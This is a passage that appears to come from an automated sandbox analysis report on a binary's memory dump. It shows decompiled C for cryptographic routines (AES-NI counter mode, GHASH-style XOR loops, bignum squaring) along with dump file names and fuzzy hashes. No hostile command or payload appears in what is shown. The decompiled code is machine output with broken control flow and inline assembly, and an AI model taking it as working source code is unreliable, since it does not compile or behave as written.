                                                              				_t93 = (_t71[1] ^ _t140) & _t90;
                                                              				_t172[1] = _t140 ^ _t93;
                                                              				_t71[1] = _t71[1] ^ _t93;
                                                              				_t94 = _t73 - 1;
                                                              				if(_t94 > 9) {
                                                              					_t142 = 0xa;
                                                              					if(_t73 > 0xa) {
                                                              						do {
                                                              							_t135 =  *_t172;
                                                              							_t83 = _t135[_t142];
                                                              							_t139 = (( *_t71)[_t142] ^ _t83) & _t90;
                                                              							_t135[_t142] = _t83 ^ _t139;
                                                              							( *_t71)[_t142] = ( *_t71)[_t142] ^ _t139;
                                                              							_t142 = _t142 + 1;
                                                              						} while (_t142 < _a16);
                                                              					}
                                                              					goto L6;
                                                              				} else {
                                                              					switch( *((intOrPtr*)(_t94 * 4 +  &M00BA6CDC))) {
                                                              						case 0:
                                                              							goto L15;
                                                              						case 1:
                                                              							L14:
                                                              							_t82 =  *_t172;
                                                              							_t167 = _t82[1];
                                                              							_t130 = (( *_t71)[1] ^ _t167) & _t90;
                                                              							_t82[1] = _t167 ^ _t130;
                                                              							( *_t71)[1] = ( *_t71)[1] ^ _t130;
                                                              							goto L15;
                                                              						case 2:
                                                              							L13:
                                                              							_t81 =  *_t172;
                                                              							_t164 = _t81[2];
                                                              							_t126 = (( *_t71)[2] ^ _t164) & _t90;
                                                              							_t81[2] = _t164 ^ _t126;
                                                              							( *_t71)[2] = ( *_t71)[2] ^ _t126;
                                                              							goto L14;
                                                              						case 3:
                                                              							L12:
                                                              							_t80 =  *_t172;
                                                              							_t161 = _t80[3];
                                                              							_t122 = (( *_t71)[3] ^ _t161) & _t90;
                                                              							_t80[3] = _t161 ^ _t122;
                                                              							( *_t71)[3] = ( *_t71)[3] ^ _t122;
                                                              							goto L13;
                                                              						case 4:
                                                              							L11:
                                                              							_t79 =  *_t172;
                                                              							_t158 = _t79[4];
                                                              							_t118 = (( *_t71)[4] ^ _t158) & _t90;
                                                              							_t79[4] = _t158 ^ _t118;
                                                              							( *_t71)[4] = ( *_t71)[4] ^ _t118;
                                                              							goto L12;
                                                              						case 5:
                                                              							L10:
                                                              							_t78 =  *_t172;
                                                              							_t155 = _t78[5];
                                                              							_t114 = (( *_t71)[5] ^ _t155) & _t90;
                                                              							_t78[5] = _t155 ^ _t114;
                                                              							( *_t71)[5] = ( *_t71)[5] ^ _t114;
                                                              							goto L11;
                                                              						case 6:
                                                              							L9:
                                                              							_t77 =  *_t172;
                                                              							_t152 = _t77[6];
                                                              							_t110 = (( *_t71)[6] ^ _t152) & _t90;
                                                              							_t77[6] = _t152 ^ _t110;
                                                              							( *_t71)[6] = ( *_t71)[6] ^ _t110;
                                                              							goto L10;
                                                              						case 7:
                                                              							L8:
                                                              							_t76 =  *_t172;
                                                              							_t149 = _t76[7];
                                                              							_t106 = (( *_t71)[7] ^ _t149) & _t90;
                                                              							_t76[7] = _t149 ^ _t106;
                                                              							( *_t71)[7] = ( *_t71)[7] ^ _t106;
                                                              							goto L9;
                                                              						case 8:
                                                              							L7:
                                                              							_t75 =  *_t172;
                                                              							_t146 = _t75[8];
                                                              							_t102 = (( *_t71)[8] ^ _t146) & _t90;
                                                              							_t75[8] = _t146 ^ _t102;
                                                              							( *_t71)[8] = ( *_t71)[8] ^ _t102;
                                                              							goto L8;
                                                              						case 9:
                                                              							L6:
                                                              							_t74 =  *_t172;
                                                              							_t143 = _t74[9];
                                                              							_t98 = (( *_t71)[9] ^ _t143) & _t90;
                                                              							_t74[9] = _t143 ^ _t98;
                                                              							( *_t71)[9] = ( *_t71)[9] ^ _t98;
                                                              							goto L7;
                                                              					}
                                                              				}
                                                              				L15:
                                                              				_t173 =  *_t172;
                                                              				_t170 =  *_t173;
                                                              				_t134 = ( *( *_t71) ^ _t170) & _t90;
                                                              				 *_t173 = _t170 ^ _t134;
                                                              				_t72 =  *_t71;
                                                              				 *_t72 =  *_t72 ^ _t134;
                                                              				return _t72;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b01e3de4bbd11fab696b551688293b66de8f0d720162844bc074d04e1013a08
                                                              • Instruction ID: 300affc0df856514f8407d8bd9ef85a3a4f838000f0f458e71b49a0d64cfe0bc
                                                              • Opcode Fuzzy Hash: 5b01e3de4bbd11fab696b551688293b66de8f0d720162844bc074d04e1013a08
                                                              • Instruction Fuzzy Hash: 83515076A05A018FD718CF1AC481946F7E3FFDD31072AC699C5999B32AD730F8429A94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 32%
                                                              			E00B9D9D9(unsigned int __ebx, void* __ecx, void* __edx, signed int __edi, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, signed int _a56, signed int _a60, signed int _a64, signed int _a68, signed int _a84) {
                                                              				void* __esi;
                                                              				signed int* _t108;
                                                              				signed int* _t116;
                                                              				unsigned int _t136;
                                                              				intOrPtr _t137;
                                                              				intOrPtr _t138;
                                                              				signed int _t140;
                                                              				signed int _t152;
                                                              				unsigned int _t164;
                                                              				intOrPtr _t173;
                                                              				signed int _t182;
                                                              				intOrPtr _t183;
                                                              				signed int _t185;
                                                              				intOrPtr _t186;
                                                              				intOrPtr* _t187;
                                                              				intOrPtr _t188;
                                                              				intOrPtr _t189;
                                                              				intOrPtr _t192;
                                                              				signed int _t195;
                                                              				signed int _t196;
                                                              				void* _t202;
                                                              
                                                              				_t182 = __edi;
                                                              				_t136 = __ebx;
                                                              				while(1) {
                                                              					L3:
                                                              					_a16 = _a16 + 1;
                                                              					_t140 = (_t164 << 0x00000020 | _t140) >> 1;
                                                              					_t164 = _t164 >> 1;
                                                              					if((_t140 & 0x00000001) == 0) {
                                                              						continue;
                                                              					} else {
                                                              						goto L4;
                                                              					}
                                                              					while(1) {
                                                              						L4:
                                                              						_push(_a16);
                                                              						_push(_t187);
                                                              						_t108 = E00B9D530();
                                                              						_t196 = _t195 + 8;
                                                              						if(_t108 == 0) {
                                                              							break;
                                                              						}
                                                              						 *(_t187 + 0x68) =  *(_t187 + 0x68) ^  *_t108;
                                                              						 *(_t187 + 0x6c) =  *(_t187 + 0x6c) ^ _t108[1];
                                                              						 *(_t187 + 0x70) =  *(_t187 + 0x70) ^ _t108[2];
                                                              						 *(_t187 + 0x74) =  *(_t187 + 0x74) ^ _t108[3];
                                                              						_t116 = (_t182 -  *((intOrPtr*)(_t187 + 0x48)) - 1 << 4) + _a20;
                                                              						_a36 =  *(_t187 + 0x68) ^  *_t116;
                                                              						_a40 =  *(_t187 + 0x6c) ^ _t116[1];
                                                              						_a44 = _t116[2] ^  *(_t187 + 0x70);
                                                              						_a48 = _t116[3] ^  *(_t187 + 0x74);
                                                              						 *((intOrPtr*)( *_t187))( &_a36,  &_a52,  *((intOrPtr*)(_t187 + 8)));
                                                              						 *(_t187 + 0x78) =  *(_t187 + 0x78) ^ _a52;
                                                              						 *(_t187 + 0x7c) =  *(_t187 + 0x7c) ^ _a56;
                                                              						 *(_t187 + 0x80) =  *(_t187 + 0x80) ^ _a60;
                                                              						 *(_t187 + 0x84) =  *(_t187 + 0x84) ^ _a64;
                                                              						_t192 = _a28;
                                                              						_t195 = _t196 + 0xc;
                                                              						_t182 = _t182 + 1;
                                                              						asm("adc ebx, 0x0");
                                                              						_t202 = _t136 - _t192;
                                                              						if(_t202 < 0 || _t202 <= 0 && _t182 <= _a24) {
                                                              							_t140 = _t182;
                                                              							_t164 = _t136;
                                                              							_a16 = 0;
                                                              							if((_t182 & 0x00000001) == 0) {
                                                              								do {
                                                              									goto L3;
                                                              								} while ((_t140 & 0x00000001) == 0);
                                                              							}
                                                              							continue;
                                                              						} else {
                                                              							_t152 = _a32;
                                                              							_t173 = _a24;
                                                              							_t185 = _a84 & 0x0000000f;
                                                              							if(_t185 > 0) {
                                                              								 *(_t187 + 0x6c) =  *(_t187 + 0x6c) ^  *(_t187 + 0x24);
                                                              								 *(_t187 + 0x68) =  *(_t187 + 0x68) ^  *(_t187 + 0x20);
                                                              								 *(_t187 + 0x74) =  *(_t187 + 0x74) ^  *(_t187 + 0x2c);
                                                              								 *(_t187 + 0x70) =  *(_t187 + 0x70) ^  *(_t187 + 0x28);
                                                              								_a36 = 0;
                                                              								_a40 = 0;
                                                              								_a44 = 0;
                                                              								_a48 = 0;
                                                              								E00C6B7A0(_t136, _t185, _t187,  &_a36, (_t152 << 4) + _a20, _t185);
                                                              								 *((char*)(_t195 + _t185 + 0x30)) = 0x80;
                                                              								_a52 =  *(_t187 + 0x68) ^ _a36;
                                                              								_a56 =  *(_t187 + 0x6c) ^ _a40;
                                                              								_a60 = _a44 ^  *(_t187 + 0x70);
                                                              								_a64 = _a48 ^  *(_t187 + 0x74);
                                                              								 *((intOrPtr*)( *_t187))( &_a52,  &_a36,  *((intOrPtr*)(_t187 + 8)));
                                                              								 *(_t187 + 0x78) =  *(_t187 + 0x78) ^ _a36;
                                                              								 *(_t187 + 0x7c) =  *(_t187 + 0x7c) ^ _a40;
                                                              								 *(_t187 + 0x80) =  *(_t187 + 0x80) ^ _a44;
                                                              								_t173 = _a24;
                                                              								_t195 = _t195 + 0x18;
                                                              								 *(_t187 + 0x84) =  *(_t187 + 0x84) ^ _a48;
                                                              							}
                                                              							_pop(_t186);
                                                              							 *((intOrPtr*)(_t187 + 0x4c)) = _t192;
                                                              							 *((intOrPtr*)(_t187 + 0x48)) = _t173;
                                                              							_pop(_t189);
                                                              							_pop(_t138);
                                                              							return E00C69C26(1, _t138, _a68 ^ _t195, _t173, _t186, _t189);
                                                              						}
                                                              						L13:
                                                              					}
                                                              					_pop(_t183);
                                                              					_pop(_t188);
                                                              					_pop(_t137);
                                                              					return E00C69C26(0, _t137, _a68 ^ _t196, _t164, _t183, _t188);
                                                              					goto L13;
                                                              					L3:
                                                              					_a16 = _a16 + 1;
                                                              					_t140 = (_t164 << 0x00000020 | _t140) >> 1;
                                                              					_t164 = _t164 >> 1;
                                                              				}
                                                              			}
                                                              0x00000000
                                                              0x00b9da99
                                                              0x00b9db8b
                                                              0x00b9db8c
                                                              0x00b9db8e
                                                              0x00b9db9b
                                                              0x00000000
                                                              0x00b9d9e0
                                                              0x00b9d9e0
                                                              0x00b9d9e4
                                                              0x00b9d9ef
                                                              0x00b9d9f1

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91c4b42d9cc7a207ca6aacbf1f36683e1ba95b8e53cefcaaa68828bda594ca16
                                                              • Instruction ID: 863299f24eb18963cdf0209e66dcc6c70d87b4c9182d527d61ecfa6bffb69879
                                                              • Opcode Fuzzy Hash: 91c4b42d9cc7a207ca6aacbf1f36683e1ba95b8e53cefcaaa68828bda594ca16
                                                              • Instruction Fuzzy Hash: 3F518075A08B009FD368CF29C581A5BBBE1FF8C310F558A2EE59A87660D731E841CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 36%
                                                              			E00B9D7D0(intOrPtr __ebx, void* __ebp, signed int _a1, intOrPtr _a4, signed int _a5, char _a8, signed int _a9, unsigned int _a12, short _a13, signed int _a15, signed char _a16, signed int _a18, signed int _a19, signed char _a20, signed char _a22, signed char _a23, signed char _a24, intOrPtr _a28, signed char _a32, signed char _a36, signed char _a40, intOrPtr _a44, signed char _a48, signed char _a49, signed char _a50, signed char _a51, signed char _a52, signed char _a53, signed char _a54, signed char _a55, signed char _a56, intOrPtr _a60, char _a64, unsigned int _a68, signed char _a71, signed int _a72, intOrPtr* _a80, intOrPtr _a84, intOrPtr _a88, signed char _a92) {
                                                              				signed char _v0;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t62;
                                                              				unsigned int _t76;
                                                              				signed char _t81;
                                                              				signed char _t82;
                                                              				signed int _t101;
                                                              				intOrPtr _t102;
                                                              				intOrPtr _t103;
                                                              				signed char _t109;
                                                              				signed char _t116;
                                                              				signed char _t124;
                                                              				signed char _t126;
                                                              				intOrPtr _t129;
                                                              				intOrPtr* _t132;
                                                              				signed int _t137;
                                                              				signed int _t139;
                                                              
                                                              				_t91 = __ebx;
                                                              				E00C6BB10(0x4c);
                                                              				_t62 =  *0xcc5970; // 0x851ab4dd
                                                              				_a72 = _t62 ^ _t137;
                                                              				_t103 = _a84;
                                                              				_t132 = _a80;
                                                              				_t129 = _a88;
                                                              				_t64 = _t129 - 1;
                                                              				if(_t129 - 1 > 0xe) {
                                                              					L3:
                                                              					return E00C69C26(_t64 | 0xffffffff, _t91, _a72 ^ _t137, _t121, _t129, _t132);
                                                              				} else {
                                                              					_t64 = _a92;
                                                              					_t121 = _t64 - 1;
                                                              					if(_t64 - 1 > 0xf) {
                                                              						goto L3;
                                                              					} else {
                                                              						_v0 = _t64 << 0x00000004 & 0x000000fe;
                                                              						_a1 = 0;
                                                              						_a5 = 0;
                                                              						_a9 = 0;
                                                              						_a13 = 0;
                                                              						_a15 = 0;
                                                              						E00C6B7A0(__ebx, _t129, _t132,  &_a16 - _t129, _t103, _t129);
                                                              						 *( &_a15 - _t129) =  *( &_a15 - _t129) | 0x00000001;
                                                              						_a64 = _a8;
                                                              						_t76 = _a12;
                                                              						_a68 = _t76;
                                                              						_a56 = _v0;
                                                              						_a60 = _a4;
                                                              						_a71 = _t76 >> 0x00000018 & 0x000000c0;
                                                              						 *((intOrPtr*)( *_t132))( &_a56,  &_a16,  *((intOrPtr*)(_t132 + 8)), __ebp, __ebx);
                                                              						_t109 = _a16;
                                                              						_t81 = _a20;
                                                              						_t124 = _a24;
                                                              						_a48 = _t109 ^ _t109;
                                                              						_a32 = _t109;
                                                              						_a50 = _a19 & 0x000000ff ^ _a18;
                                                              						_a49 = _a18 ^ _t109;
                                                              						_a51 = _t81 ^ _a19;
                                                              						_a52 = _t81 ^ _t81;
                                                              						_t116 = _a22;
                                                              						_a36 = _t81;
                                                              						_t82 = _a23;
                                                              						_a53 = _t116 ^ _t81;
                                                              						_a40 = _t124;
                                                              						_a54 = _t82 ^ _t116;
                                                              						_t139 = _t137 + 0x18;
                                                              						_t101 = _a15 & 7;
                                                              						_a44 = _a28;
                                                              						_a55 = _t124 ^ _t82;
                                                              						_t126 =  &(( &_a48)[_t139]);
                                                              						E00B9D3D0(_t101, _t126, _t132 + 0x88, (_a15 & 0x3f) >> 3);
                                                              						_pop(_t102);
                                                              						 *(_t132 + 0x97) =  *(_t132 + 0x97) | ( *(_t139 +  &_a64) & 0x000000ff & (_t126 | 0x000000ff) << 0x00000008) >> 0x00000008 - _t101;
                                                              						return E00C69C26(1, _t102, _a72 ^ _t139, (_t126 | 0x000000ff) << 8, _t132 + 0x88, _t132);
                                                              					}
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6751eedb1fd028d48fd4015affb39f07af50c667493a1034d70b936175a3a42
                                                              • Instruction ID: 60d51113cc60fdd494e479c8aaaf65148c59f0e2e6605b0300daded16f5ab637
                                                              • Opcode Fuzzy Hash: c6751eedb1fd028d48fd4015affb39f07af50c667493a1034d70b936175a3a42
                                                              • Instruction Fuzzy Hash: DE4132B620D3809FC301CB69849059BFBE5ABDA310F885D6EF4D887342D6B4E548CB53
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E00BC8670(void* __eflags, signed int* _a4, signed int* _a8, signed int _a12) {
                                                              				signed int _t111;
                                                              				signed int _t112;
                                                              				signed int _t113;
                                                              				signed int _t114;
                                                              				signed int _t115;
                                                              				signed int _t116;
                                                              				signed int _t117;
                                                              				signed int _t118;
                                                              				signed int _t119;
                                                              				signed int _t121;
                                                              				signed int _t123;
                                                              				signed int _t125;
                                                              				signed int _t127;
                                                              				signed int _t129;
                                                              				signed int _t131;
                                                              				signed int _t133;
                                                              				signed int* _t134;
                                                              				signed int _t137;
                                                              				signed int _t139;
                                                              				signed int _t141;
                                                              				signed int _t142;
                                                              				signed int _t143;
                                                              				signed int _t144;
                                                              				signed int _t145;
                                                              				signed int _t147;
                                                              				signed int* _t163;
                                                              				signed int* _t165;
                                                              				signed int* _t168;
                                                              
                                                              				_t111 = 0xecc790;
                                                              				asm("bt dword [eax], 0x1a");
                                                              				if(__eflags >= 0) {
                                                              					_t168 = _a4;
                                                              					_t165 = _a8;
                                                              					_t137 = _a12 & 0xfffffff8;
                                                              					__eflags = _t137;
                                                              					while(_t137 != 0) {
                                                              						_t119 =  *_t165;
                                                              						 *_t168 = _t119 * _t119;
                                                              						_t168[1] = _t119 * _t119 >> 0x20;
                                                              						_t121 = _t165[1];
                                                              						_t168[2] = _t121 * _t121;
                                                              						_t168[3] = _t121 * _t121 >> 0x20;
                                                              						_t123 = _t165[2];
                                                              						_t168[4] = _t123 * _t123;
                                                              						_t168[5] = _t123 * _t123 >> 0x20;
                                                              						_t125 = _t165[3];
                                                              						_t168[6] = _t125 * _t125;
                                                              						_t168[7] = _t125 * _t125 >> 0x20;
                                                              						_t127 = _t165[4];
                                                              						_t168[8] = _t127 * _t127;
                                                              						_t168[9] = _t127 * _t127 >> 0x20;
                                                              						_t129 = _t165[5];
                                                              						_t168[0xa] = _t129 * _t129;
                                                              						_t168[0xb] = _t129 * _t129 >> 0x20;
                                                              						_t131 = _t165[6];
                                                              						_t168[0xc] = _t131 * _t131;
                                                              						_t168[0xd] = _t131 * _t131 >> 0x20;
                                                              						_t133 = _t165[7];
                                                              						_t111 = _t133 * _t133;
                                                              						_t168[0xe] = _t111;
                                                              						_t168[0xf] = _t133 * _t133 >> 0x20;
                                                              						_t165 =  &(_t165[8]);
                                                              						_t168 =  &(_t168[0x10]);
                                                              						_t137 = _t137 - 8;
                                                              						__eflags = _t137;
                                                              					}
                                                              					_t139 = _a12 & 0x00000007;
                                                              					__eflags = _t139;
                                                              					if(_t139 != 0) {
                                                              						_t112 =  *_t165;
                                                              						_t111 = _t112 * _t112;
                                                              						 *_t168 = _t111;
                                                              						_t141 = _t139 - 1;
                                                              						__eflags = _t141;
                                                              						_t168[1] = _t112 * _t112 >> 0x20;
                                                              						if(_t141 != 0) {
                                                              							_t113 = _t165[1];
                                                              							_t111 = _t113 * _t113;
                                                              							_t168[2] = _t111;
                                                              							_t142 = _t141 - 1;
                                                              							__eflags = _t142;
                                                              							_t168[3] = _t113 * _t113 >> 0x20;
                                                              							if(_t142 != 0) {
                                                              								_t114 = _t165[2];
                                                              								_t111 = _t114 * _t114;
                                                              								_t168[4] = _t111;
                                                              								_t143 = _t142 - 1;
                                                              								__eflags = _t143;
                                                              								_t168[5] = _t114 * _t114 >> 0x20;
                                                              								if(_t143 != 0) {
                                                              									_t115 = _t165[3];
                                                              									_t111 = _t115 * _t115;
                                                              									_t168[6] = _t111;
                                                              									_t144 = _t143 - 1;
                                                              									__eflags = _t144;
                                                              									_t168[7] = _t115 * _t115 >> 0x20;
                                                              									if(_t144 != 0) {
                                                              										_t116 = _t165[4];
                                                              										_t111 = _t116 * _t116;
                                                              										_t168[8] = _t111;
                                                              										_t145 = _t144 - 1;
                                                              										__eflags = _t145;
                                                              										_t168[9] = _t116 * _t116 >> 0x20;
                                                              										if(_t145 != 0) {
                                                              											_t117 = _t165[5];
                                                              											_t111 = _t117 * _t117;
                                                              											_t168[0xa] = _t111;
                                                              											__eflags = _t145 != 1;
                                                              											_t168[0xb] = _t117 * _t117 >> 0x20;
                                                              											if(_t145 != 1) {
                                                              												_t118 = _t165[6];
                                                              												_t111 = _t118 * _t118;
                                                              												__eflags = _t111;
                                                              												_t168[0xc] = _t111;
                                                              												_t168[0xd] = _t118 * _t118 >> 0x20;
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              					return _t111;
                                                              				} else {
                                                              					_t134 = _a4;
                                                              					_t163 = _a8;
                                                              					_t147 = _a12;
                                                              					goto L2;
                                                              					L2:
                                                              					asm("movd mm0, dword [edx]");
                                                              					asm("pmuludq mm0, mm0");
                                                              					_t163 =  &(_t163[1]);
                                                              					asm("movq [eax], mm0");
                                                              					_t147 = _t147 - 1;
                                                              					_t134 =  &(_t134[2]);
                                                              					if(_t147 != 0) {
                                                              						goto L2;
                                                              					} else {
                                                              						asm("emms");
                                                              						return _t134;
                                                              					}
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0956bd6b21b7d7e413a2c88ead570a8f7bfc586c99e94cf1b867e2dfec6b5a1b
                                                              • Instruction ID: 1760d258a6f6fb60320b4f9114a250e9baf38df95ebd61e00682313d539a5610
                                                              • Opcode Fuzzy Hash: 0956bd6b21b7d7e413a2c88ead570a8f7bfc586c99e94cf1b867e2dfec6b5a1b
                                                              • Instruction Fuzzy Hash: 2A4152B5900B029FC364CF2ED285912FBF5FB982107548A6ED499C7B20E730F9548F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 27%
                                                              			E00B99160(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24, intOrPtr _a224) {
                                                              				intOrPtr _v28;
                                                              				void* _v36;
                                                              				intOrPtr _v48;
                                                              				intOrPtr _v52;
                                                              				intOrPtr _v56;
                                                              				intOrPtr _v60;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				intOrPtr _v72;
                                                              				intOrPtr _t28;
                                                              				signed int _t31;
                                                              				void* _t33;
                                                              				signed int _t35;
                                                              				intOrPtr _t38;
                                                              				void* _t39;
                                                              				intOrPtr _t40;
                                                              				void* _t41;
                                                              				void* _t44;
                                                              				intOrPtr _t45;
                                                              				intOrPtr _t47;
                                                              				void* _t48;
                                                              				intOrPtr _t51;
                                                              				intOrPtr _t52;
                                                              
                                                              				_t47 = _a4;
                                                              				_t45 = _a8;
                                                              				_t28 = _a12;
                                                              				_t40 = _a16;
                                                              				_v28 = _t52;
                                                              				asm("movdqu xmm7, [ebx]");
                                                              				asm("movdqu xmm3, [ecx]");
                                                              				_t35 =  *(_t40 + 0xf0);
                                                              				 *(_t52 - 0x0000003c & 0xfffffff0) = 0xc0d0e0f;
                                                              				_v72 = 0x8090a0b;
                                                              				_v68 = 0x4050607;
                                                              				_v64 = 0x10203;
                                                              				_v60 = 1;
                                                              				_v56 = 0;
                                                              				_v52 = 0;
                                                              				_v48 = 0;
                                                              				asm("movdqa xmm5, [esp]");
                                                              				asm("movdqa xmm2, xmm7");
                                                              				_t51 = _t40;
                                                              				_t31 = _t35;
                                                              				asm("pshufb xmm7, xmm5");
                                                              				asm("movups xmm0, [edx]");
                                                              				asm("movups xmm1, [edx+0x10]");
                                                              				_t41 = _t40 + 0x20;
                                                              				asm("xorps xmm2, xmm0");
                                                              				do {
                                                              					asm("aesenc xmm2, xmm1");
                                                              					_t35 = _t35 - 1;
                                                              					asm("movups xmm1, [edx]");
                                                              					_t41 = _t41 + 0x10;
                                                              				} while (_t35 != 0);
                                                              				asm("aesenclast xmm2, xmm1");
                                                              				asm("movups xmm6, [esi]");
                                                              				asm("paddq xmm7, [esp+0x10]");
                                                              				_t48 = _t47 + 0x10;
                                                              				_t33 = 0x10 - (_t31 << 4);
                                                              				while(1) {
                                                              					asm("xorps xmm6, xmm2");
                                                              					asm("movdqa xmm2, xmm7");
                                                              					asm("movups [edi], xmm6");
                                                              					_t45 = _t45 + 0x10;
                                                              					asm("pshufb xmm2, xmm5");
                                                              					_t28 = _t28 - 1;
                                                              					if(_t28 == 0) {
                                                              						break;
                                                              					}
                                                              					asm("movups xmm0, [ebp]");
                                                              					_t39 = _t33;
                                                              					asm("movups xmm1, [ebp+0x10]");
                                                              					asm("xorps xmm6, xmm0");
                                                              					asm("xorps xmm2, xmm0");
                                                              					asm("xorps xmm3, xmm6");
                                                              					asm("movups xmm0, [ebp+0x20]");
                                                              					do {
                                                              						asm("aesenc xmm2, xmm1");
                                                              						asm("aesenc xmm3, xmm1");
                                                              						asm("movups xmm1, [edx+ecx]");
                                                              						_t39 = _t39 + 0x20;
                                                              						asm("aesenc xmm2, xmm0");
                                                              						asm("aesenc xmm3, xmm0");
                                                              						asm("movups xmm0, [edx+ecx-0x10]");
                                                              					} while (_t39 != 0);
                                                              					asm("movups xmm6, [esi]");
                                                              					asm("paddq xmm7, [esp+0x10]");
                                                              					asm("aesenc xmm2, xmm1");
                                                              					asm("aesenc xmm3, xmm1");
                                                              					asm("aesenclast xmm2, xmm0");
                                                              					asm("aesenclast xmm3, xmm0");
                                                              					_t48 = _t48 + 0x10;
                                                              				}
                                                              				_t38 = _a224;
                                                              				asm("movups xmm0, [edx]");
                                                              				asm("movups xmm1, [edx+0x10]");
                                                              				asm("xorps xmm6, xmm0");
                                                              				_t44 = _t51 + 0x20;
                                                              				asm("xorps xmm3, xmm6");
                                                              				do {
                                                              					asm("aesenc xmm3, xmm1");
                                                              					_t38 = _t38 - 1;
                                                              					asm("movups xmm1, [edx]");
                                                              					_t44 = _t44 + 0x10;
                                                              				} while (_t38 != 0);
                                                              				asm("aesenclast xmm3, xmm1");
                                                              				asm("movups [edi], xmm3");
                                                              				asm("pxor xmm0, xmm0");
                                                              				asm("pxor xmm1, xmm1");
                                                              				asm("pxor xmm2, xmm2");
                                                              				asm("pxor xmm3, xmm3");
                                                              				asm("pxor xmm4, xmm4");
                                                              				asm("pxor xmm5, xmm5");
                                                              				asm("pxor xmm6, xmm6");
                                                              				asm("pxor xmm7, xmm7");
                                                              				return _t28;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7ad43ef9492b0eabf3af094ecf28adf8b082ba3035ed07e572c91c519b4f747
                                                              • Instruction ID: 32a52684b21525c1c8eed40f083ed9766ad7d8329b44efec72d17bde9370eacd
                                                              • Opcode Fuzzy Hash: d7ad43ef9492b0eabf3af094ecf28adf8b082ba3035ed07e572c91c519b4f747
                                                              • Instruction Fuzzy Hash: F741B234D0CF5A97D7029F3DC441166F7A0BFAA248F04CB1EED9436562E731BAC89691
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E00BA41C0(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __edx, intOrPtr __edi, void* __ebp, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, char _a20, signed int _a24, signed int _a25, signed int _a26, signed int _a27, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a44, intOrPtr* _a48, intOrPtr _a52, intOrPtr _a56) {
                                                              				unsigned int _v0;
                                                              				void* __esi;
                                                              				signed int _t51;
                                                              				unsigned int _t55;
                                                              				unsigned int _t59;
                                                              				unsigned int _t70;
                                                              				intOrPtr _t71;
                                                              				char* _t77;
                                                              				intOrPtr* _t81;
                                                              				void* _t96;
                                                              				intOrPtr _t97;
                                                              				intOrPtr _t98;
                                                              				intOrPtr* _t99;
                                                              				intOrPtr _t101;
                                                              				signed int _t102;
                                                              				signed int _t104;
                                                              
                                                              				_t93 = __edi;
                                                              				_t84 = __edx;
                                                              				_t66 = __ebx;
                                                              				E00C6BB10(0x28);
